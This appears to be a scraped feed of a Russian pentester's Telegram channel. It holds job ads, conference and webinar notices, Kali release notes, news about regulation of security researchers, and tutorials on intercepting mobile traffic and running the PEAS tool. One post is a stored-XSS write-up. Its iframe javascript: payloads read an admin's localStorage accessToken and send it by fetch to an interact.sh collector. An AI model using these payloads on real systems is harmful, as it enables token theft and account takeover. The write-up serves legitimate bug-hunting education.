Forwarded from Path Secure (CuriV)
Привет-привет!
Ищу к нам в команду опытного специалиста для самостоятельного выполнения проектов по пентесту внешки/внутрянки. Для некоторых самоуправление является бременем, а для кого-то благодатью. Если интересно, то откликайтесь!
Вот здесь немного о том, в какой парадигме мы живем:
https://t.iss.one/pathsecure/370
Далее заголовок вакансии:
У нас необычный и интересный формат конкурсного собеседования, который уже был опробирован на других позициях :)
Детали здесь:
https://hh.ru/vacancy/123321284
Контакт для связи с HR:
@marina_du
Всем хорошего дня!
Ищу к нам в команду опытного специалиста для самостоятельного выполнения проектов по пентесту внешки/внутрянки. Для некоторых самоуправление является бременем, а для кого-то благодатью. Если интересно, то откликайтесь!
Вот здесь немного о том, в какой парадигме мы живем:
https://t.iss.one/pathsecure/370
Далее заголовок вакансии:
Мы —первый в России производственный кооператив в сфере ИБ, где нет бюрократии, зато есть свобода действий, энергия стартапа и команда, которая ценит экспертизу и обмен знаниями.
Кого мы ищем?
Специалиста, который заинтересован работать в неформальных коллективах или осознает, что подготовлен к нему и мечтает преодолеть отчуждение крупных корпораций и классических фирм, чтобы попасть именно в такой, даже ценой комфорта и безопасности.
Подумайте, пожалуйста, готовы ли Вы к такому и нужно ли это именно Вам на данном этапе жизни и эволюции?
У нас необычный и интересный формат конкурсного собеседования, который уже был опробирован на других позициях :)
Как устроено наше сотрудничество?
Вы откликаетесь на вакансию.
1) Мы проводим предварительный отбор резюме и просим выполнить небольшое задание по профилю вакансии.
2) Отобранные кандидаты приглашаются на неформальное онлайн-знакомство (обсуждаем соответствие по ценностям нашего кооператива и предлагает пройти тестовую игру для синхронизации, проявляемся, задаем друг другу вопросы, погружаемся в культуру).
3) Голосуем внутри за кандидатов на основе записи встречи-знакомства.
4) HR дообсуждает с выбранными кандидатами условия (уже 1-1).
5) С финальным списком отобранных товарищей проводим онлайн психометрический тест (ПИФ Экопси: измеряет аналитические способности, открытость изменениям, способность доводить дело до конца, лидерские качества).
6) Принимаем окончательное решение по предложению наиболее подходящему, на наш взгляд, кандидату и синхронизируемся с ним по договоренностям.
Нам не нужно «идеальное» резюме. Ценим искренность, стремление эффективно доводить проекты до согласованного результата, реальные компетенции и готовность к диалогу и ответственности за взятые на себя обязательства.
Детали здесь:
https://hh.ru/vacancy/123321284
Контакт для связи с HR:
@marina_du
Всем хорошего дня!
Telegram
Path Secure
Хочу поделиться радостью от успешной реализации социального института!
Примерно год назад я задумался, что нам в кооперативе RAD COP жизненно необходимо создать процесс системной подготовки будущих товарищей пентестеров. Причем под системностью я понимаю…
Примерно год назад я задумался, что нам в кооперативе RAD COP жизненно необходимо создать процесс системной подготовки будущих товарищей пентестеров. Причем под системностью я понимаю…
❤3🔥1🤝1
Всем привет! 🤝 Давно не был на связи.
Недавно поступила идея написать скрипт для пассивной разведки. Очень часто нужно быстро собрать информацию о заказчике и хотелось бы сделать это одной кнопкой. В итоге с коллегой собрали инструменты до кучи и что из этого получилось скоро поделимся.
Недавно поступила идея написать скрипт для пассивной разведки. Очень часто нужно быстро собрать информацию о заказчике и хотелось бы сделать это одной кнопкой. В итоге с коллегой собрали инструменты до кучи и что из этого получилось скоро поделимся.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤2🔥1
Forwarded from Пентестер на мотоцикле
Закончился мой потрясающий отпуск, возвращаюсь к созданию контента.
Сложа руки не сидел, вместе с коллегой делали классный инструмент для 100% пассивной разведки на внешнем периметре. Сейчас он готов для локального использования, но у меня есть планы опубликовать его на этом канале. Как только всё сложится и будет готово, обязательно сообщу!
Всем добра)
Please open Telegram to view this post
VIEW IN TELEGRAM
💯6👍2
ZeroNights 2025: Call for Papers открыт!
Конференция ZeroNights сохраняет свою тематическую направленность — только беспристрастно отобранные доклады о проблемах информационной безопасности.
В этом году программный комитет принимает заявки в двух направлениях:
🔹 Offensive Track — современные техники атак, багхантерство, методы выявления и эксплуатации уязвимостей.
🔹 SecOps Track — практическая защита: от кода до инфраструктуры, реальные кейсы SecOps и рабочие подходы к AppSec.
📅 Дедлайн подачи заявок — 12 октября 2025 (включительно).
🎤 Форматы выступлений: 30 или 45 минут.
📍 Формат участия: только офлайн.
💡 Организаторы поощряют эксклюзивные материалы: если ваш доклад ранее нигде не публиковался, можно рассчитывать на денежное вознаграждение.
👉 Если у вас есть исследование, практический опыт или новые идеи в области Offensive или SecOps — самое время подать заявку!
Конференция ZeroNights сохраняет свою тематическую направленность — только беспристрастно отобранные доклады о проблемах информационной безопасности.
В этом году программный комитет принимает заявки в двух направлениях:
🔹 Offensive Track — современные техники атак, багхантерство, методы выявления и эксплуатации уязвимостей.
🔹 SecOps Track — практическая защита: от кода до инфраструктуры, реальные кейсы SecOps и рабочие подходы к AppSec.
📅 Дедлайн подачи заявок — 12 октября 2025 (включительно).
🎤 Форматы выступлений: 30 или 45 минут.
📍 Формат участия: только офлайн.
💡 Организаторы поощряют эксклюзивные материалы: если ваш доклад ранее нигде не публиковался, можно рассчитывать на денежное вознаграждение.
👉 Если у вас есть исследование, практический опыт или новые идеи в области Offensive или SecOps — самое время подать заявку!
👍3🔥3👏2🤝1
МВД РФ сообщило, что после ограничения звонков в мессенджерах Telegram и WhatsApp (Meta, признана экстремистской и запрещена в РФ) мошенники массово переключились на сервис Google Meet 📞.
Google Meet резко вырос в популярности и занял второе место среди бесплатных приложений в App Store .
По данным ведомства, количество звонков с международных номеров через сотовую связь выросло до 83% 📈, но главным каналом для связи с жертвами стал именно Google Meet. Также преступные группы тестируют FaceTime и мессенджер Max.
Мошенники быстро адаптируются: их кол-центры, базы и схемы не могут простаивать. Интерес к Google Meet объясняется его распространенностью (предустановлен на большинстве Android-смартфонов 📱) и сложностью расследований — оперативно получить данные у Google практически невозможно 🔒.
Google Meet резко вырос в популярности и занял второе место среди бесплатных приложений в App Store .
По данным ведомства, количество звонков с международных номеров через сотовую связь выросло до 83% 📈, но главным каналом для связи с жертвами стал именно Google Meet. Также преступные группы тестируют FaceTime и мессенджер Max.
Мошенники быстро адаптируются: их кол-центры, базы и схемы не могут простаивать. Интерес к Google Meet объясняется его распространенностью (предустановлен на большинстве Android-смартфонов 📱) и сложностью расследований — оперативно получить данные у Google практически невозможно 🔒.
❤1👍1🥴1🌚1🍌1🤨1🤓1👀1🤪1🙊1
Forwarded from RAD COP
Как защитить бизнес от хакеров, шифровальщиков, утечек и потери работоспособности
3 сентября специалисты по анализу защищенности РАД КОП расскажут об информационной безопасности на примерах распространённых уязвимостей из собственной практики пентестов (или, как принято говорить в отечественных стандартах, тестирования на проникновение).
🎙 Вебинар пройдет в формате диалога, будет наполнен практическими кейсами и инсайтами.
Вебинар поможет заинтересованным участникам найти свой ответ на вопрос: зачем нужна информационная безопасность, как устроены распространенные хакерские атаки и что можно сделать, чтобы не пополнить ряды тех, кто был «зашифрован», столкнулся с утечкой персональных данных клиентов или привлек внимание правоохранительных органов.
↕️ Что обсудим:
— Краткий ликбез по ключевым терминам, ИТ и ИБ концепциям, которые определяют контекст хакерских атак и их последствий для собственников, государства, пользователей/клиентов/сотрудников;
— Уязвимости API и логики работы веб-приложений, которые статистически часто лежат в основе успешных атак и приводят к утечкам данных, нарушениям работоспособности организаций;
— Социальную инженерию, сценарии которой задействованы в половине корпоративных атак, включая целевой фишинг и мошенничество с установлением физического контакта с жертвой;
— Защищённость внутреннего периметра: локальная сеть и инфраструктура организации, которые могут быть недоступны извне, и в атаках на которые часто играют свою роль инсайдеры и безалаберные сотрудники с удаленным доступом;
— Первопричины и риски, которые стоят за этими уязвимостями, как через подход «люди-процессы-технологии» можно приоритезировать соответствующие задачи, и в чем сходство управления уязвимостями и тайм-менеджмента.
⚙️ Вы научитесь:
— Базовым терминам и ключевым концепциям ИТ и ИБ необходимым для понимания проблематики компьютерных атак;
— Распознавать ключевые уязвимости и их первопричины;
— Оценивать риски, которые несут конкретные сценарии атак;
— Выстраивать внутренние процессы, чтобы снизить уязвимость и повысить устойчивость.
🤝 Кому полезен вебинар:
Техническим специалистам блоков ИТ и ИБ, топ-менеджменту и собственникам организаций, иным лицам интересующимся в информационной безопасности, которые хотят лучше разбираться в проблематике хакерских атак, рисков, в сценариях нападения и методологии выстраивания защиты через приоритезацию и управление.
Дата и время: 3 сентября 17.00
Ссылка для регистрации — https://my.mts-link.ru/j/tmliga/2728011485
Присоединяйтесь, если готовы трансформировать проблемы в преимущества ваших организаций вместе с РАД КОП🤝
#Вебинар #Пентест
3 сентября специалисты по анализу защищенности РАД КОП расскажут об информационной безопасности на примерах распространённых уязвимостей из собственной практики пентестов (или, как принято говорить в отечественных стандартах, тестирования на проникновение).
Вебинар поможет заинтересованным участникам найти свой ответ на вопрос: зачем нужна информационная безопасность, как устроены распространенные хакерские атаки и что можно сделать, чтобы не пополнить ряды тех, кто был «зашифрован», столкнулся с утечкой персональных данных клиентов или привлек внимание правоохранительных органов.
— Краткий ликбез по ключевым терминам, ИТ и ИБ концепциям, которые определяют контекст хакерских атак и их последствий для собственников, государства, пользователей/клиентов/сотрудников;
— Уязвимости API и логики работы веб-приложений, которые статистически часто лежат в основе успешных атак и приводят к утечкам данных, нарушениям работоспособности организаций;
— Социальную инженерию, сценарии которой задействованы в половине корпоративных атак, включая целевой фишинг и мошенничество с установлением физического контакта с жертвой;
— Защищённость внутреннего периметра: локальная сеть и инфраструктура организации, которые могут быть недоступны извне, и в атаках на которые часто играют свою роль инсайдеры и безалаберные сотрудники с удаленным доступом;
— Первопричины и риски, которые стоят за этими уязвимостями, как через подход «люди-процессы-технологии» можно приоритезировать соответствующие задачи, и в чем сходство управления уязвимостями и тайм-менеджмента.
— Базовым терминам и ключевым концепциям ИТ и ИБ необходимым для понимания проблематики компьютерных атак;
— Распознавать ключевые уязвимости и их первопричины;
— Оценивать риски, которые несут конкретные сценарии атак;
— Выстраивать внутренние процессы, чтобы снизить уязвимость и повысить устойчивость.
Техническим специалистам блоков ИТ и ИБ, топ-менеджменту и собственникам организаций, иным лицам интересующимся в информационной безопасности, которые хотят лучше разбираться в проблематике хакерских атак, рисков, в сценариях нападения и методологии выстраивания защиты через приоритезацию и управление.
Дата и время: 3 сентября 17.00
Ссылка для регистрации — https://my.mts-link.ru/j/tmliga/2728011485
Присоединяйтесь, если готовы трансформировать проблемы в преимущества ваших организаций вместе с РАД КОП
#Вебинар #Пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6👍2👨💻1
Всем привет!
Завтра состоится вебинар. С коллегами поделимся живыми кейсами. Поговорим о тайм-менеджменте.
Основная аудитория - это собственники бизнеса. Однако будем рады видеть всех!
https://t.iss.one/failauth/111
Завтра состоится вебинар. С коллегами поделимся живыми кейсами. Поговорим о тайм-менеджменте.
Основная аудитория - это собственники бизнеса. Однако будем рады видеть всех!
https://t.iss.one/failauth/111
Telegram
Fail Auth
Как защитить бизнес от хакеров, шифровальщиков, утечек и потери работоспособности
3 сентября специалисты по анализу защищенности РАД КОП расскажут об информационной безопасности на примерах распространённых уязвимостей из собственной практики пентестов (или…
3 сентября специалисты по анализу защищенности РАД КОП расскажут об информационной безопасности на примерах распространённых уязвимостей из собственной практики пентестов (или…
👍3❤2🔥1
📱 Пентест мобильных приложений всегда начинается с правильной настройки перехвата трафика.
Без прокси-туннеля между устройством и сервером невозможно полноценно анализировать взаимодействие клиента с бэкендом. Поэтому первым шагом всегда идет конфигурация окружения для работы через BurpSuite, mitmproxy или Caido.
Процесс стандартный: приложение на телефоне должно отправлять весь сетевой трафик через прокси. Для этого указываем IP-адрес машины с установленным инструментом и порт прослушивания. Следующий обязательный этап — установка и доверие корневого сертификата прокси на мобильном устройстве. Это позволяет расшифровывать HTTPS-трафик и работать с ним так же, как при классическом тестировании веб-приложений.
После успешной настройки открывается возможность контролировать весь обмен данными: видеть запросы, редактировать параметры, проверять работу авторизации и API, отслеживать обработку токенов и сессий. Именно на этой точке пентестер получает полный обзор коммуникации между клиентом и сервером, что делает возможным дальнейший поиск уязвимостей.
⚠️ На практике часто встречается SSL Pinning — когда приложение не доверяет сторонним сертификатам и отказывается работать через прокси. В таких случаях необходимо обходить защиту: использовать патчинг приложения (например, через Frida или Objection), либо динамически подменять функции проверки сертификатов. Этот шаг иногда требует больше времени, но без него полноценный анализ просто невозможен.
Таким образом, настройка перехвата трафика — это не просто техническая деталь, а фундаментальный этап, без которого дальнейший анализ мобильного приложения невозможен.
📚 Подробные руководства по настройке перехвата трафика можно найти в документации:
» PortSwigger (BurpSuite)
» Mobile Testing Guide проекта OWASP MASTG
Эти материалы детально разбирают как базовые настройки, так и типовые проблемы, возникающие при работе с современными приложениями.
Без прокси-туннеля между устройством и сервером невозможно полноценно анализировать взаимодействие клиента с бэкендом. Поэтому первым шагом всегда идет конфигурация окружения для работы через BurpSuite, mitmproxy или Caido.
Процесс стандартный: приложение на телефоне должно отправлять весь сетевой трафик через прокси. Для этого указываем IP-адрес машины с установленным инструментом и порт прослушивания. Следующий обязательный этап — установка и доверие корневого сертификата прокси на мобильном устройстве. Это позволяет расшифровывать HTTPS-трафик и работать с ним так же, как при классическом тестировании веб-приложений.
После успешной настройки открывается возможность контролировать весь обмен данными: видеть запросы, редактировать параметры, проверять работу авторизации и API, отслеживать обработку токенов и сессий. Именно на этой точке пентестер получает полный обзор коммуникации между клиентом и сервером, что делает возможным дальнейший поиск уязвимостей.
⚠️ На практике часто встречается SSL Pinning — когда приложение не доверяет сторонним сертификатам и отказывается работать через прокси. В таких случаях необходимо обходить защиту: использовать патчинг приложения (например, через Frida или Objection), либо динамически подменять функции проверки сертификатов. Этот шаг иногда требует больше времени, но без него полноценный анализ просто невозможен.
Таким образом, настройка перехвата трафика — это не просто техническая деталь, а фундаментальный этап, без которого дальнейший анализ мобильного приложения невозможен.
📚 Подробные руководства по настройке перехвата трафика можно найти в документации:
» PortSwigger (BurpSuite)
» Mobile Testing Guide проекта OWASP MASTG
Эти материалы детально разбирают как базовые настройки, так и типовые проблемы, возникающие при работе с современными приложениями.
❤8👍3🔥2
Разработчики представили Kali Linux 2025.3 — третий релиз текущего года, в котором появились 10 новых инструментов, поддержка Nexmon и улучшения NetHunter.
Nexmon представляет собой фреймворк для патчинга прошивок Wi-Fi чипов Broadcom и Cypress, который позволяет включать режим мониторинга и осуществлять инъекции фреймов. Кроме того, в этом релизе ряд обновлений получили Kali NetHunter (включая поддержку Samsung S10) и Kali NetHunter Car Hacking (включая обновленный UI и множество исправленных багов). Также команда Kali пообещала в будущем выпустить видео о том, как использовать CARsenal, с наглядной демонстрацией различных возможностей.
⚙️ Что касается новых инструментов, в Kali Linux 2025.3 их насчитывается десять:
📄 Среди других изменений и улучшений в этой версии можно перечислить:
Nexmon представляет собой фреймворк для патчинга прошивок Wi-Fi чипов Broadcom и Cypress, который позволяет включать режим мониторинга и осуществлять инъекции фреймов. Кроме того, в этом релизе ряд обновлений получили Kali NetHunter (включая поддержку Samsung S10) и Kali NetHunter Car Hacking (включая обновленный UI и множество исправленных багов). Также команда Kali пообещала в будущем выпустить видео о том, как использовать CARsenal, с наглядной демонстрацией различных возможностей.
➖ Caido / Caido-cli — полноценный десктоп + серверная часть для web-аудита➖ Detect It Easy (DiE) — определение форматов PE, ELF и др.➖ Gemini CLI — опенсорс агент ИИ в терминале➖ krbrelayx — атаки Kerberos relay + abuse unconstrained delegation➖ ligolo-mp — мультипользовательский пивотинг➖ llm-tools-nmap — nmap через LLM➖ mcp-kali-server — настройка MCP-сервера➖ patchleaks — анализ патчей и поиск свежих CVE➖ vwifi-dkms — фейковые Wi-Fi сети
➖ плагин VPN IP panel в Xfce теперь дает возможность выбрать отслеживаемый интерфейс для удобного копирования IP-адреса VPN-соединения в буфер обмена;➖ Kali прекращает поддержку ARMel (Acorn RISC Machine, Little-Endian);➖ появилась возможность устанавливать модули ядра с Magisk, но разработчики предупреждают, что пока это экспериментальная версия.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥5❤2👍2
Всем привет!
Довольно часто на проектах попадается Microsoft Outlook Web Access (OWA).
Столкнулся с проблемой установки инcтрумента PEAS, который помогает протестировать ActiveSync (EAS).
EAS - протокол Microsoft для синхронизации мобильных устройств с Exchange Server.
Утилита устарела, написана под Python 2 и требует ручной правки зависимостей.
В итоге решил проблему с помощью docker.
git clone https://github.com/snovvcrash/peas ~/tools/peas-m && cd ~/tools/peas-m
python3 -m virtualenv --python=/usr/bin/python venv && source ./venv/bin/activate
🐳 Создаем Dockerfile внутри директории рядом с файлом requirements.txt
FROM python:2.7-slim
RUN sed -i 's|deb.debian.org|archive.debian.org|g' /etc/apt/sources.list && \
sed -i 's|security.debian.org|archive.debian.org|g' /etc/apt/sources.list && \
apt update && \
apt install -y git build-essential libxml2-dev libxslt1-dev libffi-dev libssl-dev
RUN git clone https://github.com/snovvcrash/peas /opt/peas
WORKDIR /opt/peas
RUN pip install -r requirements.txt
ENTRYPOINT ["python", "-m", "peas"]
sudo docker build -t peas-py2 .
✔️ Запуск и работа с утилитой:
sudo docker run --rm --net=host -v "$PWD/peas-out":/opt/peas/out peas-py2 -u 'DOMEN\test' -p 'Password123' example.com --list-unc='\\DC-name\' --check
Надеюсь, кому-то пригодится!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🏆2👨💻1😎1
По данным РБК, обсуждается новая версия законопроекта о госрегулировании деятельности white-hat'ов. Основное:
🔸 Вводится термин "мероприятие по поиску уязвимостей", под который попадают:
— публичные bug bounty-программы;
— внутренние bug bounty;
— любые независимые исследования;
— пентесты по договорам.
🔸 Что планируют?
— Создание реестра сертифицированных исследователей;
— Идентификация и аккредитация всех white-hat'ов;
— Жёсткие правила обработки и передачи уязвимостей;
— Обязательное уведомление не только владельца ресурса, но и силовые ведомства;
— Работа вне аккредитованных площадок — под запретом.
🔸 Мнение рынка:
— Реестр = деанонимизация → угроза для безопасности исследователей.
— Падение числа участников bug bounty.
— Псевдонимы — не про “анонимность”, а про риски.
🔸 Поправка в УК (ст. 274): передача сведений об уязвимостях с нарушением установленных правил может квалифицироваться как противоправное деяние.
🔸 Кто будет контролировать?
ФСБ, ФСТЭК, НКЦКИ — полное регулирование.
🔸 Минцифры: законопроект «ещё может меняться», министерство "в диалоге".
Please open Telegram to view this post
VIEW IN TELEGRAM
🥴3👨💻2❤1👍1🔥1🥰1😎1
Отличный доклад от коллеги о системе «12-недельный год». Сейчас применяю этот подход — он помогает не просто быстро, а реально двигаться к целям и видеть ощутимые результаты уже за 12 недель, не растягивая всё на год. Рекомендую всем, кто хочет прокачать эффективность, фокус и дисциплину.
Telegram
Осипов.Про ИБ [cистемный подход]
Как мы достигаем целей за 12 недель ? ⠩⣈⡆⣄⠩⠎⠇ ⡉⢰⠙⡅⡔⠇⡂⠌⣈
Ранее уже писал, что эффективно использовать квартальное планирование для достижения поставленных целей.
И даже при реализации от 60% целей квартальных планов вы сделаете за год х2-х4 больше, чем при…
Ранее уже писал, что эффективно использовать квартальное планирование для достижения поставленных целей.
И даже при реализации от 60% целей квартальных планов вы сделаете за год х2-х4 больше, чем при…
🔥4❤2👍1🏆1
Всем привет! 🤝
Коллега поделился полезной штукой, которую долго вымучивал😂 . Забирайте
https://t.iss.one/pathsecure/376
https://github.com/curiv/postgres-1c-for-pentest/
Коллега поделился полезной штукой, которую долго вымучивал
https://t.iss.one/pathsecure/376
https://github.com/curiv/postgres-1c-for-pentest/
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Path Secure
Postgres 1C для пентеста
При внутреннем или внешнем пентесте компаний можно обнаружить сервис 1С. Этот продукт зачастую используется для финансового или управленческого учета. При сценарии внутреннего тестирования вам может посчастливиться достучаться до…
При внутреннем или внешнем пентесте компаний можно обнаружить сервис 1С. Этот продукт зачастую используется для финансового или управленческого учета. При сценарии внутреннего тестирования вам может посчастливиться достучаться до…
🏆3🤝2❤1🔥1😁1
ZeroNights 2025 начала публиковать программу — уже можно посмотреть описания докладов Offensive и SecOps треков.
✅ DisTrolles. Мал контейнер, да дорог — про плюсы и минусы перехода на distroless-образы и реальные рекомендации по внедрению.
✅ Плагины атакуют! — разбор кейсов, когда вредоносные расширения попадали в Visual Studio Code Marketplace несмотря на проверки.
✅ Охота на IDOR-ов — как автоматизировать поиск сложных проблем авторизации в больших API.
Программу можно посмотреть здесь: ZeroNights 2025
Программу можно посмотреть здесь: ZeroNights 2025
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4👍2🏆2
HTML Injection → Stored XSS → Hijack accessToken
Во время анализа одного из веб-приложений наткнулся на поле, которое обрабатывает ввод без должной фильтрации.
Примечение: cервис фильтрует <script> теги, поэтому XSS реализован с обходом — без явного использования скриптовых тегов.
Решил проверить — вставил простой HTML:
Текст стал крупнее — значит innerHTML или подобная конструкция.
Далее потестировал теги:
Браузер создал элементы прямо в DOM. Очевидный признак HTML Injection, причём без CSP и фильтров. Поле сохраняется в базу➡️ отображается в админке ➡️ возникает вопрос: можно ли это раскрутить до XSS?
➡️ Рабочий XSS-пэйлоад:
В данном случае он читает токен из localStorage и вызывает alert() с его значением.
Минус: работает не во всех браузерах и часто режется CSP, но в слабозащищённых фронтах может быть отличной стартовой точкой.
➡️ Эскалация XSS:
Пэйлоад делает внешний запрос на ваш сервер (например, Interactsh), передавая туда значение токена. Вместо всплывающего окна (alert) вы сразу получаете лог токена.
Важно: поле, в которое внедряется нагрузка, сохраняется в базе данных и отображается в административной панели. Это означает, что код выполняется от лица администратора при просмотре, что приводит к краже его токена и потенциальному захвату аккаунта.
➡️ Особенность уязвимости теги:
➡️ Что это даёт:
➡️ Советы для тестирования:
Во время анализа одного из веб-приложений наткнулся на поле, которое обрабатывает ввод без должной фильтрации.
Примечение: cервис фильтрует <script> теги, поэтому XSS реализован с обходом — без явного использования скриптовых тегов.
Решил проверить — вставил простой HTML:
<h1>Test</h1> <!-- изменение размера шрифта -->
Текст стал крупнее — значит innerHTML или подобная конструкция.
Далее потестировал теги:
<img src="x"> <!-- битая картинка -->
<input> <!-- лишний input на странице -->
Браузер создал элементы прямо в DOM. Очевидный признак HTML Injection, причём без CSP и фильтров. Поле сохраняется в базу
<iframe src="javascript:alert(localStorage.accessToken)"></iframe>
В данном случае он читает токен из localStorage и вызывает alert() с его значением.
Минус: работает не во всех браузерах и часто режется CSP, но в слабозащищённых фронтах может быть отличной стартовой точкой.
<iframe src="javascript:fetch('//your.interact.sh?token=' + localStorage.accessToken)"></iframe>Пэйлоад делает внешний запрос на ваш сервер (например, Interactsh), передавая туда значение токена. Вместо всплывающего окна (alert) вы сразу получаете лог токена.
Важно: поле, в которое внедряется нагрузка, сохраняется в базе данных и отображается в административной панели. Это означает, что код выполняется от лица администратора при просмотре, что приводит к краже его токена и потенциальному захвату аккаунта.
🔴 Инъекция сохраняется в БД (Stored)🔴 Отрабатывает на стороне администратора🔴 Через XSS читается accessToken из localStorage
🔴 Захват токена администратора🔴 Возможность делать запросы от его имени🔴 Потенциальный full access к admin-панели
🔴 Ищите HTML-теги, которые влияют на DOM (текст, форма, медиа)🔴 Проверяйте innerHTML, outerHTML, dangerouslySetInnerHTML в React🔴 Тестируйте на img, input, iframe, svg, math, script и template🔴 Не ограничивайтесь alert(1), пробуйте localStorage, fetch, document.cookie, navigator, location🔴 Используйте Interactsh, Burp Collaborator, xsshunter для подтверждения уязвимости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8😁2✍1❤1🔥1👏1🏆1👨💻1
Коллеги, всем привет! Благодарю каждого, кто следит за каналом!
Поздравляю с наступающим. Желаю вам фокуса, тишины вокруг и чёткого понимания, куда вы идёте.
Пусть в новом году в отчётах будет больше high severity, а в жизни — больше спокойствия.
Приятно видеть, что нас становится больше. Двигаемся дальше по делу.
Поздравляю с наступающим. Желаю вам фокуса, тишины вокруг и чёткого понимания, куда вы идёте.
Пусть в новом году в отчётах будет больше high severity, а в жизни — больше спокойствия.
Приятно видеть, что нас становится больше. Двигаемся дальше по делу.
❤8🎅2🎄2